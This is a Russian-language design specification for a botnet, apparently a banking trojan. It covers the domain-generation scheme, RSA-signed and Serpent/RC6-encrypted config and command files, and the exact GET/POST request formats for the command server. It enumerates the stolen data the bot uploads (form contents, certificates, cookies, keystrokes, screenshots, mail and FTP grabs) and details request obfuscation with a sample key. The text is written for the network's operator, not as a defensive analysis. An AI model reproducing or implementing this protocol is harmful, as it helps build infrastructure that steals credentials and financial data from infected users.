dname.txt

Генерация доменых имен
----------------------

 Все боты условно делятся на несколько доменных групп (например на 4). Номер доменной группы определяется 
ботом на основе Machine ID и не меняется. Для генерации имени домена используется номер доменной группы и 
текущая дата (например, текущий месяц).
Для получения слов, используемых для создания читаемых имен, требуется текстовый файл. Это должен быть файл, 
который легко найти в сети и он не должен изменяться со временем. (например: http://constitution.org/usdeclar.txt)
Из файла выбираются отдельные слова, не меньше определенной длинны (чтобы исключить предлоги), и 
группируются в псевдо-случаные, читаемые имена. Таким образом, для каждой доменной группы ботов, раз в 
заданный период (например месяц) изменяются имена доменов.
Кол-во генерируемых имен, период смены имён, кол-во групп и список зон, для которых генерируются имена
 задаются при сборе бота.
Есть специальная утилита dname.exe для генерации имен по заданной доменной группе и дате.
Для управления ботом достаточно зарегистрировать хотя бы одно имя из, сгенерированного dname, списка для 
каждой группы.


Взаимодействие бот-сервер
--------------------------

Бот запрашивает у сервера два типа файлов: 
- конфиг-файл. Сформированый конфигуратором файл особого формата, содержащий описания инжектов.
- файл команд. Текстовый файл, содержащий команды для бота.

Все получаемые ботом фалы зашифрованы посредством Serpent(или RC6) и подписаны RSA.
Serpent-ключ генерится автоматически в момент подписи файла и хранится внутри цифровой подписи. Таким образом,
 получить Serpent-ключ взможно только расшифровав цифровую подпись.
Открытй RSA-ключ, используемый для проверки (расшифровки) цифровой подписи хранится внутри бота.
Секретный RSA-ключ, используемый для подписи файлов хранится у оператора сети.
Файлы подписываются перед загрузкой их на сервер.
Бот проверяет подписи всех получаемых файлов и игнорирует неподписанные.
Такая схема гарантирует, что задать конфиг и команды боту сможет только оператор сети, имеющий закрытый ключ.

Бот отправляет на сервер файлы следующего типа и формата (тип данных задаётся параметром type в POST-запросе):
SEND_ID_UNKNOWN	0	- неизвестно, используется только для тестирования	
SEND_ID_FORM	1	- данные HTML-форм. ASCII-заголовок + форма бинарном виде, как есть
SEND_ID_FILE	2	- любой файл, так шлются найденные по маске файлы
SEND_ID_AUTH	3	- данные IE Basic Authentication, ASCII-заголовок + бинарные данные
SEND_ID_CERTS	4	- сертификаты. Файлы PFX упакованые в CAB или ZIP.
SEND_ID_COOKIES	5	- куки и SOL-файлы. Шлются со структурой каталогов. Упакованы в CAB или ZIP
SEND_ID_SYSINFO	6	- информация о системе. UTF8(16)-файл, упакованый в CAB или ZIP
SEND_ID_SCRSHOT	7	- скриншот. GIF-файл.
SEND_ID_LOG	8	- внутренний лог бота. TXT-файл.
SEND_ID_FTP	9	- инфа с грабера FTP. TXT-файл.
SEND_ID_IM	10	- инфа с грабера IM. TXT-файл.
SEND_ID_KEYLOG	11	- лог клавиатуры. TXT-файл.
SEND_ID_PAGE_REP 12	- нотификация о полной подмене страницы TXT-файл.
SEND_ID_GRAB	13	- сграбленый фрагмент контента. ASCII заголовок + контент, как он есть
SEND_ID_MAIL	14	- отчёт мэйлграббера. CAB или ZIP содержащий текст в UTF8(16)
SEND_ID_FORM1	15	- контейнер. Архив, содержащий файлы других форматов.
SEND_ID_PLUGIN	16	- нотификация плагина (старт\стоп)
SEND_ID_VIDEO	17	- видео с экрана. CAB или ZIP, содержащий анимационный файл GIF или AVI
SEND_ID_DEVICE	18	- нотификация о добавлении устройства. ASCII текст.

Тип 15 (контейнер) содержит внутри различные файлы, тип которых можно определить по имени:
 Если имя файла состоит из 18 знаков (16-ричное число), то последние два знака обозначают 
	тип файла. Например:
		01CFD40EE4E4E2B001 - тип 01
		904F38BB782009330D - тип 13	


Передаваемые файлы могут быть зашифрованы алгоритмом Serpent(RC6) с использованием ключа обфускаци.
При обработке полученных данных нужно учитывать, что в случае, если сервер вернёт статус отличный
 от 200(OK), то софт будет слать этот же набор данных снова.

Для получения файлов используюся PHP-запросы следующего формата:
GET config.php?version=212400&user=123456&server=11&id=1000&crc=0
GET task.php?version=212400&user=123456&server=11&id=1000&crc=0

Для отсылки файлов используются PHP-запросы следующего формата:
POST data.php?version=212400&user=123456&server=11&id=1000&type=2&name=anyfile

где:
 config.php, task.php 	- имена скриптов, соответствующих конфигу и командам;
 version		- номер версии софта (XYYZZZ, где: X.YY - версия, ZZZ - сборка)
 user 			- уникальный ID пользователя (клиента)
 server			- уникальный ID сервера
 id			- номер группы бота
 type			- тип отсылаемых данных (один из, указанных выше, SEND_ID_ХХХ кодов)
 name			- имя файла\данных
 crc			- хэш CRC32. Используется только в запросах конфига. Содержит хэш предыдущего конфиг-файла
				полученного клиентом. Сервер возвращает пустую страницу если файл не изменился.
				Это сделано в целях снижения нагрузки на сервер.

Бот поддерживает следующий механизм обфускации запросов:

- формируется исходная строка с параметрами запроса;
	(например: user=123456&server=11&id=1000&crc=0)
- к строке добавляется случайный параметр;
	(например: aaa=111&user=123456&server=11&id=1000&crc=0)
- строка запроса шифруется посредством Serpent(RC6) в режиме CBC(ECB), при этом она выравнивается на длинну 
	блока при помощи добавления нулей в конец.
- шифрованая строка запроса конвертируется в BASE64
	(например: V2CLMeH2AeKub5G8GX9XhdiJGxvhcSmocxDZ+gpTRAKaN5tVMqj0/SZd9zo91Z+6)
- создается случайное имя php-скрипта для запроса, имя может быть любой длинны, важно, чтобы первая буква 
	имени соответствовала первой букве исходного скрипта.
	(например: config.php -> clsdhfrrse.php, task.php -> tmjh.php, data.php -> dfhyenfk.php)
- создается случайное имя параметра для скрипта.
	(например: ajsyu)
- формируется конечная строка с параметрами:
	(clsdhfrrse.php?ajsyu=V2CLMeH2AeKub5G8GX9XhdiJGxvhcSmocxDZ+gpTRAKaN5tVMqj0/SZd9zo91Z+6)

Для указанных примеров использовался RC6-ключ: "0123456789ABCDEF"
Ключ задается при сборке бота и должен совпадать с настройками сервера.